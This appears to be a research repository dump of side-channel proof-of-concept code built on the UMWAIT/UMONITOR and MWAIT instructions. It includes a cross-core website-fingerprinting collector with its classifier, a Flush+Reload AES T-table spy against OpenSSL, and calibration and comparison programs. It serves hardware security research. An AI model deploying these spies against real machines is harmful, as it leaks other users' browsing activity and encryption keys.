 19 | #define INSTR_WAIT asm volatile("xor %%rbx, %%rbx; umwait %%ecx; jnc 1f; inc %%rbx; 1: nop" : "=b"(carry) : "a"(-1), "d"(-1), "c"(0));
 20 | 
 21 | 
 22 | volatile int running = 1;
 23 | 
 24 | void pin_to_core(int core) {
 25 |     cpu_set_t cpuset;
 26 |     pthread_t thread;
 27 | 
 28 |     thread = pthread_self();
 29 | 
 30 |     CPU_ZERO(&cpuset);
 31 |     CPU_SET(core, &cpuset);
 32 | 
 33 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 34 | }
 35 | 
 36 | void write_speculative2(void* ptr, int value) {
 37 |     speculation_start(s);
 38 |     *(char*)ptr = 3;
 39 |     speculation_end(s);
 40 | }
 41 | 
 42 | __attribute__((aligned(4096))) char test[4096 * 256];
 43 | 
 44 | 
 45 | void* keystroke_thread(void* dummy) {
 46 |     pin_to_core(CORE_ATTACKER);
 47 |     printf("[~] Waiting for keypress (PID: %d)\n", getpid());
 48 |     test[OFFSET] = 1;
 49 | 
 50 |     while(1) {
 51 |         getchar();
 52 |         printf("[+] Do the transient writes!\n");
 53 |         asm volatile("mfence");
 54 |         size_t c = 0;
 55 |         while(1) {
 56 |             write_speculative2(test + OFFSET, 2); // speculative write to address, triggers
 57 |         }
 58 |         asm volatile("mfence");
 59 |     }
 60 | 
 61 | }
 62 | 
 63 | volatile size_t cnt = 0, cnt_carry = 0;
 64 | 
 65 | void sigalarm(int num) {
 66 |     printf("Count: %zd (Carry: %zd)\n", cnt, cnt_carry);
 67 |     cnt = 0;
 68 |     cnt_carry = 0;
 69 |     alarm(1);
 70 | }
 71 | 
 72 | /* Application entry */
 73 | int main(int argc, char *argv[]) {
 74 |     
 75 |     pthread_t p;
 76 |     pthread_create(&p, NULL, keystroke_thread, NULL);
 77 |     sched_yield();
 78 | 
 79 |     pin_to_core(CORE_VICTIM);
 80 | 
 81 |     memset(test, 1, sizeof(test));
 82 |     signal(SIGALRM, sigalarm);
 83 |     alarm(1);
 84 |     signal(SIGSEGV, trycatch_segfault_handler);
 85 | 
 86 | 
 87 |     while(1) {
 88 |         INSTR_MONITOR
 89 |         size_t carry = 0;
 90 |         INSTR_WAIT
 91 |         cnt_carry += carry;
 92 | 
 93 |         // verify that there was no architectural modification
 94 |         if(test[OFFSET] != 1) {
 95 |             printf("Oh no!\n");
 96 |         }
 97 |         cnt++;
 98 |     }
 99 | 
100 | 
101 |     return 0;
102 | }
103 | 


--------------------------------------------------------------------------------
/comparison/umwait/main.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <stdint.h>
  4 | #include <stdlib.h>
  5 | #include <string.h>
  6 | #include <pthread.h>
  7 | #include <fcntl.h>
  8 | #include <time.h>
  9 | #include <sched.h>
 10 | #include "../cacheutils.h"
 11 | 
 12 | #define CORE1 1 
 13 | #define CORE2 0
 14 | 
 15 | #define EVENT_INTERVAL 1000
 16 | 
 17 | #define OFFSET (64 * 21)
 18 | 
 19 | volatile char __attribute__((aligned(4096))) data[4096];
 20 | size_t event_internal = 500000;
 21 | 
 22 | #define INSTR_MONITOR asm volatile("umonitor %%rax" : : "a"(data), "c"(0), "d"(0));
 23 | #define INSTR_WAIT asm volatile("xor %%rbx, %%rbx; umwait %%rcx; jnc 1f; inc %%rbx; 1: nop" : "=b"(carry) : "a"(-1), "d"(-1), "c"(0));
 24 | #define INSTR_NAME "UMONITOR"
 25 | 
 26 | void pin_to_core(int core) {
 27 |     cpu_set_t cpuset;
 28 |     pthread_t thread;
 29 | 
 30 |     thread = pthread_self();
 31 | 
 32 |     CPU_ZERO(&cpuset);
 33 |     CPU_SET(core, &cpuset);
 34 | 
 35 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 36 | }
 37 | 
 38 | void write_speculative2(void* ptr) {
 39 |     speculation_start(s);
 40 |     *(char*)ptr ^= 1;
 41 |     speculation_end(s);
 42 | }
 43 | 
 44 | int cnt = 0;
 45 | size_t volatile t_sync = 0; 
 46 | 
 47 | void* accessor(void* dummy) {
 48 |     
 49 |     pin_to_core(CORE2);
 50 | 
 51 |     int seed = time(NULL); srand(seed);
 52 |     printf("Go!\n");
 53 | 
 54 |     while(1) {
 55 | 
 56 | 	    sched_yield();
 57 | 	    size_t r = rand() % event_internal + 1;
 58 | 
 59 |         // wait(r);
 60 | 	    wait(EVENT_INTERVAL);
 61 | 
 62 |         //write_speculative2(data);
 63 | 	    write_speculative2(data+OFFSET); // CONTROL
 64 | 	    cnt++;
 65 |     }
 66 | }
 67 | 
 68 | int main() {
 69 | 
 70 |     memset(data, 1, sizeof(data));
 71 |     
 72 |     pin_to_core(CORE1);
 73 | 
 74 |     int pos = 0, t = 0; 
 75 |     int start = time(NULL);
 76 |     int current = time(NULL);
 77 | 
 78 |     pthread_t pt;
 79 |     pthread_create(&pt, NULL, accessor, NULL);
 80 | 
 81 |     while(1) {
 82 | 
 83 | 	    /* UMONITOR */
 84 | 	    INSTR_MONITOR
 85 |         size_t carry = 0;
 86 |         INSTR_WAIT
 87 |         if(!carry)
 88 |             pos++;
 89 | 	
 90 | 	    current = time(NULL);
 91 |         if(start != current) {
 92 |             start = current;
 93 | 
 94 |             printf("%5d / %5d (%.2f)\n", pos, cnt, pos * 100.0 / cnt);
 95 |             pos = 0;
 96 |             cnt = 0;
 97 |             t++;
 98 | 
 99 |             if (t==1000) {
100 |                 t = 0;
101 |                 event_internal = event_internal * 4 / 5;
102 |                 printf("event_internal alters!!!\n\n");
103 |                 if (event_internal < 500)
104 |                     break;
105 |             }
106 | 
107 |         }
108 |     }
109 |     
110 | }
111 | 


--------------------------------------------------------------------------------
/website_fingerprinting/list.txt:
--------------------------------------------------------------------------------
  1 | https://www.google.com
  2 | https://www.youtube.com
  3 | https://www.baidu.com
  4 | https://www.facebook.com
  5 | https://www.tmall.com
  6 | https://www.qq.com
  7 | https://www.taobao.com
  8 | https://www.sohu.com
  9 | https://www.yahoo.com
 10 | https://www.amazon.com
 11 | https://www.360.cn
 12 | https://www.jd.com
 13 | https://www.zhihu.com
 14 | https://www.wikipedia.org
 15 | https://www.sina.com.cn
 16 | https://www.weibo.com
 17 | https://www.netflix.com
 18 | https://www.163.com
 19 | https://www.instagram.com
 20 | https://www.bilibili.com
 21 | https://www.live.com
 22 | https://www.reddit.com
 23 | https://www.so.com
 24 | https://www.chaturbate.com
 25 | https://www.sogou.com
 26 | https://www.bing.com
 27 | https://www.zoom.us
 28 | https://www.google.com.hk
 29 | https://www.csdn.net
 30 | https://www.alipay.com
 31 | https://www.microsoft.com
 32 | https://www.soso.com
 33 | https://www.tianya.cn
 34 | https://www.vk.com
 35 | https://www.twitch.tv
 36 | https://www.myshopify.com
 37 | https://www.twitter.com
 38 | https://www.naver.com
 39 | https://www.yahoo.co.jp
 40 | https://www.office.com
 41 | https://www.zhanqi.tv
 42 | https://www.aliexpress.com
 43 | https://panda.tv
 44 | https://www.amazon.in
 45 | https://www.apple.com
 46 | https://www.bongacams.com
 47 | https://www.amazon.co.jp
 48 | https://www.ebay.com
 49 | https://www.whatsapp.com
 50 | https://www.okezone.com
 51 | https://www.yandex.ru
 52 | https://www.adobe.com
 53 | https://www.hao123.com
 54 | https://www.tiktok.com
 55 | https://www.microsoftonline.com
 56 | https://www.1688.com
 57 | https://www.binance.com
 58 | https://www.ok.ru
 59 | https://www.mail.ru
 60 | https://www.douban.com
 61 | https://www.linkedin.com
 62 | http://www.xinhuanet.com
 63 | https://www.blogger.com
 64 | https://www.etsy.com
 65 | https://www.msn.com
 66 | https://www.cnblogs.com
 67 | https://www.google.co.jp
 68 | https://www.google.co.in
 69 | https://www.pornhub.com
 70 | https://www.tradingview.com
 71 | https://www.google.com.br
 72 | https://www.huanqiu.com
 73 | https://www.aliyun.com
 74 | https://www.imdb.com
 75 | https://www.force.com
 76 | https://www.fandom.com
 77 | https://www.canva.com
 78 | https://www.medium.com
 79 | https://www.roblox.com
 80 | https://www.xvideos.com
 81 | https://www.pikiran-rakyat.com
 82 | https://www.yy.com
 83 | https://www.indeed.com
 84 | https://www.telegram.org
 85 | https://www.freepik.com
 86 | https://www.wordpress.com
 87 | https://www.google.de
 88 | https://www.chase.com
 89 | https://www.xhamster.com
 90 | https://www.flipkart.com
 91 | https://www.udemy.com
 92 | https://www.alibaba.com
 93 | https://www.spotify.com
 94 | https://www.w3schools.com
 95 | https://www.liputan6.com
 96 | https://www.dropbox.com
 97 | https://www.tribunnews.com
 98 | https://www.17ok.com
 99 | https://www.intuit.com
100 | https://www.primevideo.com 
101 | 


--------------------------------------------------------------------------------
/website_fingerprinting/main.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | 
  5 | #include <sys/types.h>
  6 | #include <sys/stat.h>
  7 | #include <sys/time.h>
  8 | #include <fcntl.h>
  9 | #include "cacheutils.h"
 10 | #include <pthread.h>
 11 | #include <sched.h>
 12 | #include <signal.h>
 13 | #include <linux/membarrier.h>
 14 | 
 15 | #include "core_observer.h"
 16 | #define CORE_WEBSITE 1
 17 | 
 18 | #define OFFSET (64 * 21)
 19 | 
 20 | #ifdef UMONITOR
 21 | #define INSTR_MONITOR asm volatile("umonitor %%rax" : : "a"(test + OFFSET), "c"(0), "d"(0));
 22 | #define INSTR_WAIT asm volatile("umwait %%rcx" : : "a"(-1), "d"(-1), "c"(0));
 23 | #define INSTR_NAME "UMONITOR"
 24 | #endif
 25 | #ifdef MONITORX
 26 | #define INSTR_MONITOR asm volatile("monitorx" : : "a"(test + OFFSET), "c"(0), "d"(0));
 27 | #define INSTR_WAIT asm volatile("mwaitx" : : "a"(-1), "d"(-1), "c"(0));
 28 | #define INSTR_NAME "MONITORX"
 29 | #endif
 30 | #ifdef WFI
 31 | #define INSTR_MONITOR 
 32 | #define INSTR_WAIT asm volatile("wfi");
 33 | #define INSTR_NAME "WFI"
 34 | #endif
 35 | 
 36 | // time interval for observing number of wakeups (in microseconds)
 37 | #define TIMER 10*1000
 38 | 
 39 | 
 40 | #define TIMER_S  (TIMER / (1000000))
 41 | #define TIMER_US (TIMER % (1000000))
 42 | 
 43 | 
 44 | 
 45 | struct itimerval timer = {
 46 |     .it_interval = {.tv_sec = TIMER_S, .tv_usec = TIMER_US},
 47 |     .it_value = {.tv_sec = TIMER_S, .tv_usec = TIMER_US}
 48 | };
 49 | 
 50 | void pin_to_core(int core) {
 51 |     cpu_set_t cpuset;
 52 |     pthread_t thread;
 53 | 
 54 |     thread = pthread_self();
 55 | 
 56 |     CPU_ZERO(&cpuset);
 57 |     CPU_SET(core, &cpuset);
 58 | 
 59 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 60 | }
 61 | 
 62 | __attribute__((aligned(4096))) char test[4096 * 256];
 63 | 
 64 | volatile size_t cnt = 0, run = 0, sum = 0;
 65 | volatile FILE* f;
 66 | 
 67 | void sigalarm(int num) {
 68 |     printf("Count: %zd\n", cnt);
 69 |     fprintf(f, "%zd\n", cnt);
 70 |     fflush(f);
 71 |     cnt = 0;
 72 | }
 73 | 
 74 | void* open_ws(void* ws) {
 75 |     usleep(100000);
 76 |     char cmd[128];
 77 |     sprintf(cmd, "curl %s", (char*)ws);
 78 |     system(cmd);
 79 |     usleep(100000);
 80 |     exit(0);
 81 | }
 82 | 
 83 | /* Application entry */
 84 | int main(int argc, char *argv[]) {
 85 |     if(argc <= 1) {
 86 |         printf("Usage: %s <website>\n", argv[0]);
 87 |         exit(1);
 88 |     }
 89 |     memset(test, 1, sizeof(test));
 90 |     
 91 |     pin_to_core(CORE_OBSERVER);
 92 |     
 93 |     f = fopen("log.txt", "w");
 94 | 
 95 |     signal(SIGALRM, sigalarm);
 96 |     setitimer(ITIMER_REAL, &timer, NULL);
 97 |     
 98 |     pthread_t p;
 99 |     pthread_create(&p, NULL, open_ws, argv[1]);
100 | 
101 |     while(1) {
102 |         INSTR_MONITOR
103 |         INSTR_WAIT
104 |         cnt++;
105 |     }
106 | 
107 |     return 0;
108 | }
109 | 
110 | 


--------------------------------------------------------------------------------
/comparison/fr/main.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <stdint.h>
  4 | #include <stdlib.h>
  5 | #include <string.h>
  6 | #include <pthread.h>
  7 | #include <fcntl.h>
  8 | #include <time.h>
  9 | #include <sched.h>
 10 | #include "../cacheutils.h"
 11 | 
 12 | #define CORE1 1 
 13 | #define CORE2 0
 14 | 
 15 | #define CACHE_HIT_THRESHOLD 65 
 16 | #define WINDOW_SIZE 1000
 17 | 
 18 | #define OFFSET (64 * 21)
 19 | 
 20 | volatile char __attribute__((aligned(4096))) data[4096];
 21 | size_t event_internal = 500000;
 22 | 
 23 | void pin_to_core(int core) {
 24 |     cpu_set_t cpuset;
 25 |     pthread_t thread;
 26 | 
 27 |     thread = pthread_self();
 28 | 
 29 |     CPU_ZERO(&cpuset);
 30 |     CPU_SET(core, &cpuset);
 31 | 
 32 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 33 | }
 34 | 
 35 | void write_speculative2(void* ptr) {
 36 |     speculation_start(s);
 37 |     *(char*)ptr ^= 1;
 38 |     speculation_end(s);
 39 | }
 40 | 
 41 | int cnt = 0;
 42 | size_t volatile t_sync = 0; 
 43 | 
 44 | void* accessor(void* dummy) {
 45 |     pin_to_core(CORE2);
 46 |     int seed = time(NULL); srand(seed);
 47 |     printf("Go!\n");
 48 | 
 49 |     while(1) {
 50 | 	    sched_yield();
 51 | 	    size_t r = rand() % event_internal + 1;
 52 | 
 53 |         wait(r);
 54 | 	    //wait(event_internal);
 55 | 
 56 |         write_speculative2(data);
 57 | 	    //write_speculative2(data+OFFSET); // CONTROL (Error Rate)
 58 | 	    cnt++;
 59 |     }
 60 | }
 61 | 
 62 | int main() {
 63 |     memset(data, 1, sizeof(data));
 64 |     
 65 |     pin_to_core(CORE1);
 66 | 
 67 |     int pos = 0, t = 0; 
 68 |     int start = time(NULL);
 69 |     int current = time(NULL);
 70 | 
 71 |     maccess(data); flush(data); mfence();
 72 |     size_t begin = rdtsc();
 73 |     flush_reload_t(data); 
 74 |     size_t end = rdtsc();
 75 |     mfence();
 76 |     printf("F+R blind_spot: %d\n", end - begin);
 77 | 
 78 |     float acc_arr[100] = {0};
 79 | 
 80 |     size_t window_size = 3200; // Make sure the blind spot rate is less than 10%
 81 |     size_t delta = 0;
 82 |     pthread_t pt;
 83 |     pthread_create(&pt, NULL, accessor, NULL);
 84 | 
 85 |     while(1) {
 86 | 
 87 |         /* F+R */
 88 |         flush(data);
 89 |         wait(window_size);
 90 |         
 91 |         if (reload_t(data) < CACHE_HIT_THRESHOLD)
 92 |             pos++;
 93 | 
 94 | 	    current = time(NULL);
 95 |         if(start != current) {
 96 |             start = current;
 97 | 	    
 98 |             printf("window_cycle: %ld; %d / %d (%.2f)\n", wait(window_size), pos, cnt, pos * 100.0 / cnt);
 99 | 	        t++;
100 |             pos = 0;
101 | 	        cnt = 0;
102 |             
103 |             if (t == 1000) {
104 |                 t = 0;
105 |                 event_internal = event_internal * 4 / 5;
106 |                 printf("event internal alters!!!\n\n");
107 |                 if (event_internal < 500)
108 |                     break;
109 | 
110 |             }
111 | 
112 |         }
113 |     }
114 |     
115 | }
116 | 


--------------------------------------------------------------------------------
/website_classify/classify2.py:
--------------------------------------------------------------------------------
 1 | import matplotlib.pyplot as plt
 2 | import numpy as np
 3 | import pandas as pd
 4 | from sklearn.model_selection import train_test_split
 5 | from sktime.classification.distance_based import KNeighborsTimeSeriesClassifier
 6 | from sklearn.metrics import confusion_matrix
 7 | from sklearn.metrics import accuracy_score
 8 | from sklearn.metrics import classification_report
 9 | from sklearn.metrics import ConfusionMatrixDisplay
10 | import tikzplotlib
11 | 
12 | from os import listdir
13 | from os.path import isfile, join
14 | 
15 | path = "../website_fingerprinting/results/" # the result from website_fingerprint
16 | filt = ["google", "youtube", "tmall", "facebook", "qq", "baidu", "sohu", "taobao", "360", "jd", "amazon", "yahoo", "wikipedia", "zoom", "netflix"]
17 | do_filt = False
18 | maxtraces = -1
19 | 
20 | 
21 | files_all = [ f for f in listdir(path) if isfile(join(path, f)) and ".txt" in f ]
22 | files = []
23 | if do_filt:
24 |     for f in files_all:
25 |         ok = False
26 |         for fi in filt:
27 |             if fi in f:
28 |                 ok = True
29 |                 break
30 |         if ok:
31 |             if maxtraces != -1:
32 |                 if int(f.split("_")[1].split(".")[0]) >= maxtraces:
33 |                     ok = False
34 | 
35 |         if ok:
36 |             files.append(f)
37 | else: files = files_all
38 | 
39 | print(files)
40 | 
41 | sequences = list()
42 | target = list()
43 | 
44 | maxlen = 0
45 | for f in files:
46 |     if do_filt and not ok: continue
47 |     df = pd.read_csv(path + f, header=0)
48 |     values = df.values.flatten()
49 |     maxlen = max(len(values), maxlen)
50 | print("Trace length: %d" % maxlen)
51 | maxlen = 230
52 | 
53 | for f in files:
54 |     df = pd.read_csv(path + f, header=0)
55 |     values = df.values.flatten()
56 |     if len(values) > maxlen:
57 |         values = values[:maxlen]
58 |     np_values = np.array(values, dtype=np.double)
59 |     np_values = np.pad(np_values, (0, maxlen - len(values)), 'constant')
60 |     sequences.append(np_values)
61 |     target.append(f.split("_")[0])
62 | 
63 | X = pd.DataFrame({'col1': sequences })
64 | y = pd.Series(target)
65 | 
66 | X_train, X_test, y_train, y_test = train_test_split(X.iloc[:], y)
67 | print(X_train.shape, y_train.shape, X_test.shape, y_test.shape)
68 | 
69 | labels, counts = np.unique(y_train, return_counts=True)
70 | 
71 | 
72 | knn = KNeighborsTimeSeriesClassifier(n_neighbors=1, distance="dtw", n_jobs=-1)
73 | knn.fit(X_train, y_train)
74 | print("KNN score:")
75 | print(knn.score(X_test, y_test))
76 | 
77 | y_pred = knn.predict(X_test)
78 | print(y_pred)
79 | print(accuracy_score(y_test, y_pred))
80 | print(classification_report(y_test, y_pred))
81 | cm = confusion_matrix(y_test, y_pred)
82 | print(cm)
83 | for line in cm:
84 |     lsum = max(1, sum(line.tolist()))
85 |     print(",".join([str(100.0 * x / lsum) for x in line.tolist()]))
86 | 
87 | ConfusionMatrixDisplay.from_predictions(y_test, y_pred)
88 | plt.xticks(rotation=45)
89 | 
90 | tikzplotlib.save("confusion.tikz")
91 | plt.show()
92 | 


--------------------------------------------------------------------------------
/timed_mwait_feat/hello.c:
--------------------------------------------------------------------------------
  1 | 
  2 | #include <linux/module.h>
  3 | #include <linux/kernel.h>
  4 | #include <linux/sched/signal.h>
  5 | #include <linux/kthread.h>
  6 | #include <linux/delay.h>
  7 | #include <linux/init.h>
  8 | #include <asm/mwait.h>
  9 | 
 10 | MODULE_LICENSE("GPL");
 11 | MODULE_AUTHOR("R.Y.");
 12 | MODULE_DESCRIPTION("Timed MWAIT");
 13 | MODULE_VERSION("0.01");
 14 | 
 15 | #define PIN_CORE 1
 16 | 
 17 | #define OFFSET (64 * 21)
 18 |  __attribute__((aligned(4096))) char test[4096 * 32];
 19 | 
 20 | static struct task_struct *mwait_thread_st;
 21 | 
 22 | static int mwait_thread_fn(void *unused)
 23 | {
 24 |     allow_signal(SIGKILL);
 25 |     while (!kthread_should_stop())
 26 |     {
 27 |         if (signal_pending(mwait_thread_st))
 28 |             break;
 29 | 
 30 |         uint64_t high, low;
 31 |         uint64_t a, d;
 32 |         uint64_t sum = 0, cnt = 0, mcnt = 0;
 33 |         int offset = 5000;
 34 | 
 35 |         while(!kthread_should_stop()){
 36 |                 __monitor(test+OFFSET, 0, 0);
 37 |                 asm volatile("mfence");
 38 |                 asm volatile("rdtscp" : "=a"(a), "=d"(d) :: "rcx");
 39 |                 a = (d << 32) | a;
 40 |                 asm volatile("mfence");
 41 |                 uint64_t wakeup = a + offset;
 42 | 
 43 |                 // __mwait(0x0, 0);
 44 |                 // The maximum waiting time is an implicit 64-bit timestamp-counter value 
 45 |                 // stored in the EDX:EBX register pair.
 46 |                 // Test timeout by changing "b" => (0xffffffff) or "d"((wakeup >> 32) + 1) 
 47 | 		        // ECX bit 31 indicate whether timeout feature is used
 48 | 		        // EAX [0:3] indicate sub C-state; [4:7] indicate C-states e.g., 0=>C1, 1=>C2 ...
 49 |                 asm volatile("mwait" :: "a"(0), "b"(wakeup & 0xffffffff), "d"((wakeup >> 32)), "c"(2));
 50 |                 asm volatile("rdtscp" : "=a"(low), "=d"(high) :: "rcx");
 51 | 
 52 |                 uint64_t real = (high << 32) | low;
 53 |                 int diff = (int)(real - wakeup);
 54 | 
 55 |                 if(diff > 0) {
 56 |                         cnt++;
 57 |                         sum += diff;
 58 |                         mcnt++;
 59 |                 }
 60 |                 if(cnt == 1000) {
 61 |                         mcnt = 0;
 62 |                         sum = 0;
 63 |                 }
 64 |                 if(cnt == 2000) {
 65 |                         printk("Avg: %3d (Offset: %4d) -> Measured offset: %4d\n", (int)(sum / mcnt), offset, offset + (int)(sum / mcnt));
 66 |                         cnt = 0;
 67 |                         sum = 0;
 68 |                         offset++;  
 69 | 			do_exit(0);
 70 |                 }
 71 |         }
 72 |     }
 73 |     printk(KERN_INFO "Mwait Thread Stopping\n");
 74 |     do_exit(0);
 75 |     return 0;
 76 | }
 77 | 
 78 | // Module Initialization
 79 | static int __init test_start(void)
 80 | {
 81 |     printk(KERN_INFO "Creating Thread\n");
 82 | 
 83 |     mwait_thread_st = kthread_create(mwait_thread_fn, NULL, "mwait_thread");
 84 |     if (mwait_thread_st)
 85 |         printk("Mwait Thread Created successfully\n");
 86 |     else
 87 |         printk(KERN_INFO "Mwait Thread creation failed\n");
 88 |     kthread_bind(mwait_thread_st, PIN_CORE);
 89 | 
 90 |     wake_up_process(mwait_thread_st);
 91 | 
 92 |     return 0;
 93 | }
 94 | 
 95 | static void __exit test_end(void)
 96 | {
 97 |     printk(KERN_INFO "END TIMED MWAIT TEST\n");
 98 | }
 99 | 
100 | module_init(test_start);
101 | module_exit(test_end);
102 | 


--------------------------------------------------------------------------------
/aes_example/fr/spy.cpp:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <stdint.h>
  3 | #include <unistd.h>
  4 | #include <stdlib.h>
  5 | #include <openssl/aes.h>
  6 | #include <fcntl.h>
  7 | #include <sched.h>
  8 | #include <sys/mman.h>
  9 | #include "../cacheutils.h"
 10 | #include <map>
 11 | #include <vector>
 12 | 
 13 | // this number varies on different systems
 14 | #define MIN_CACHE_MISS_CYCLES (80)
 15 | 
 16 | // more encryptions show features more clearly
 17 | #define NUMBER_OF_ENCRYPTIONS (100)
 18 | 
 19 | unsigned char key[] =
 20 | {
 21 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 22 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 23 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
 24 |   0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00
 25 |   // 0x51, 0x4d, 0xab, 0x12, 0xff, 0xdd, 0xb3, 0x32, 0x52, 0x8f, 0xbb, 0x1d, 0xec, 0x45, 0xce, 0xcc, 0x4f, 0x6e, 0x9c,
 26 |   // 0x2a, 0x15, 0x5f, 0x5f, 0x0b, 0x25, 0x77, 0x6b, 0x70, 0xcd, 0xe2, 0xf7, 0x80
 27 | };
 28 | 
 29 | size_t sum;
 30 | size_t scount;
 31 | 
 32 | std::map<char*, std::map<size_t, size_t> > timings;
 33 | 
 34 | char* base;
 35 | char* probe;
 36 | char* end;
 37 | 
 38 | int main()
 39 | {
 40 |   int fd = open("/home/rzhang/openssl/libcrypto.so", O_RDONLY);
 41 |   size_t size = lseek(fd, 0, SEEK_END);
 42 |   if (size == 0)
 43 |     exit(-1);
 44 |   size_t map_size = size;
 45 |   if ((map_size & 0xFFF) != 0)
 46 |   {
 47 |     map_size |= 0xFFF;
 48 |     map_size += 1;
 49 |   }
 50 |   base = (char*) mmap(0, map_size, PROT_READ, MAP_SHARED, fd, 0);
 51 |   end = base + size;
 52 | 
 53 |   unsigned char plaintext[] =
 54 |   {
 55 |   0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0
 56 |   };
 57 |   unsigned char ciphertext[128];
 58 |   unsigned char restoredtext[128];
 59 | 
 60 |   AES_KEY key_struct;
 61 | 
 62 |   AES_set_encrypt_key(key, 128, &key_struct);
 63 | 
 64 |   uint64_t min_time = rdtsc();
 65 |   srand(min_time);
 66 |   sum = 0;
 67 |   for (size_t byte = 0; byte < 256; byte += 16)
 68 |   {
 69 |     plaintext[0] = byte;
 70 |     //plaintext[1] = byte;
 71 |     //plaintext[2] = byte;
 72 |     //plaintext[3] = byte;
 73 | 
 74 |     AES_encrypt(plaintext, ciphertext, &key_struct);
 75 | 
 76 |     // adjust me (decreasing order)
 77 |     int te0 = 0x15df80;
 78 |     int te1 = 0x15db80;
 79 |     int te2 = 0x15d780;
 80 |     int te3 = 0x15d380;
 81 | 
 82 |     //adjust address range to exclude unwanted lines/tables
 83 |     for (probe = base + te0; probe < base + te0 + 64*16; probe += 64) // hardcoded addresses (could be done dynamically)
 84 |     // for (probe = base; probe < end; probe += 64)
 85 |     {
 86 |       size_t count = 0;
 87 |       for (size_t i = 0; i < NUMBER_OF_ENCRYPTIONS; ++i)
 88 |       {
 89 |         for (size_t j = 1; j < 16; ++j)
 90 |           plaintext[j] = rand() % 256;
 91 |           
 92 |         flush(probe);
 93 |         AES_encrypt(plaintext, ciphertext, &key_struct);
 94 |   
 95 |         sched_yield();
 96 |         size_t time = rdtsc();
 97 |         maccess(probe);
 98 |         size_t delta = rdtsc() - time;
 99 |         if (delta < MIN_CACHE_MISS_CYCLES)
100 |           ++count;
101 |       }
102 |       sched_yield();
103 |       timings[probe][byte] = count;
104 |       sched_yield();
105 |     }
106 |   }
107 | 
108 |   for (auto ait : timings)
109 |   {
110 |     printf("%p", (void*) (ait.first - base));
111 |     for (auto kit : ait.second)
112 |     {
113 |       printf(",%6lu", kit.second);
114 |     }
115 |     printf("\n");
116 |   }
117 | 
118 |   close(fd);
119 |   munmap(base, map_size);
120 |   fflush(stdout);
121 |   return 0;
122 | }
123 | 
124 | 


--------------------------------------------------------------------------------
/aes_example/calibration/pad.c:
--------------------------------------------------------------------------------
  1 | #define _GNU_SOURCE
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | #include <stdint.h>
  5 | #include <unistd.h>
  6 | #include <stdlib.h>
  7 | #include <openssl/aes.h>
  8 | #include <fcntl.h>
  9 | #include <sched.h>
 10 | #include <sys/mman.h>
 11 | #include "../cacheutils.h"
 12 | #include <pthread.h>
 13 | #include <sys/types.h>
 14 | #include <sys/stat.h>
 15 | 
 16 | 
 17 | // more encryptions show features more clearly
 18 | #define NUMBER_OF_ENCRYPTIONS (100)
 19 | 
 20 | #define CORE_VICTIM 1
 21 | #define CORE_ATTACKER 0
 22 | 
 23 | #define STEP 20
 24 | //#define STEP 2
 25 | 
 26 | #define T_INIT 50000
 27 | //#define T_INIT 33490
 28 | 
 29 | #define OFFSET 64 * 21
 30 | #define INSTR_MONITOR asm volatile("umonitor %%rax" : : "a"(test), "c"(0), "d"(0));
 31 | #define INSTR_WAIT asm volatile("xor %%rbx, %%rbx; umwait %%rcx; jnc 1f; inc %%rbx; 1: nop" : "=b"(carry) : "a"(-1), "d"(-1), "c"(0));
 32 | 
 33 | __attribute__((aligned(4096))) char test[4096];
 34 | 
 35 | 
 36 | void pin_to_core(int core) {
 37 |     cpu_set_t cpuset;
 38 |     pthread_t thread;
 39 | 
 40 |     thread = pthread_self();
 41 | 
 42 |     CPU_ZERO(&cpuset);
 43 |     CPU_SET(core, &cpuset);
 44 | 
 45 |     pthread_setaffinity_np(thread, sizeof(cpu_set_t), &cpuset);
 46 | }
 47 | 
 48 | typedef size_t (*sfnc_t)(void);
 49 | 
 50 | size_t volatile t_sync = 0;
 51 | size_t volatile t = 0;
 52 | size_t volatile fast = 0;
 53 | 
 54 | #define START_MEASURE     t_sync = 1; asm volatile("mfence"); 
 55 | #define STOP_MEASURE      asm volatile("mfence");
 56 | 
 57 | void calibration(void* unuse) {
 58 | 
 59 |     size_t local_t = t;
 60 |     if (fast)
 61 |         maccess(test+OFFSET);
 62 |     else
 63 |         flush(test+OFFSET);
 64 | 
 65 |     START_MEASURE
 66 | 
 67 |     for(size_t w = 0; w < local_t; w++) asm volatile("nop\nnop\nnop\nnop\nnop\nnop\nnop\nnop");
 68 | 
 69 |     // the runtime of the observed event
 70 |     size_t x = *(volatile size_t*)(test+OFFSET); 
 71 |     asm volatile("lfence");
 72 |     test[0] = x; 
 73 | 
 74 |     STOP_MEASURE
 75 | }
 76 | 
 77 | void* assist_thread(void* dummy) {
 78 |     pin_to_core(CORE_ATTACKER);
 79 |     sleep(1);
 80 |     printf("Measuring...\n");
 81 | 
 82 |     while(1) {
 83 |         calibration(NULL);
 84 |         while(t_sync);
 85 |     }
 86 | }
 87 | 
 88 | int main()
 89 | {
 90 |     memset(test, 1, sizeof(test));
 91 |     pin_to_core(CORE_VICTIM);
 92 | 
 93 |     pthread_t p;
 94 |     pthread_create(&p, NULL, assist_thread, NULL);
 95 |     sched_yield();
 96 | 
 97 |     t = T_INIT;
 98 |     size_t misses = 0, hits = 0, tries = 0;
 99 |     
100 |     for (int i = 0; i < 10000; ++i) 
101 |     {
102 |         fast = i&1;
103 | 
104 |         for (int j = 0; j < NUMBER_OF_ENCRYPTIONS; ++j)
105 |         {
106 |             while(!(t_sync)); 
107 | 
108 |             INSTR_MONITOR
109 |             size_t carry = 0;
110 |             INSTR_WAIT
111 | 
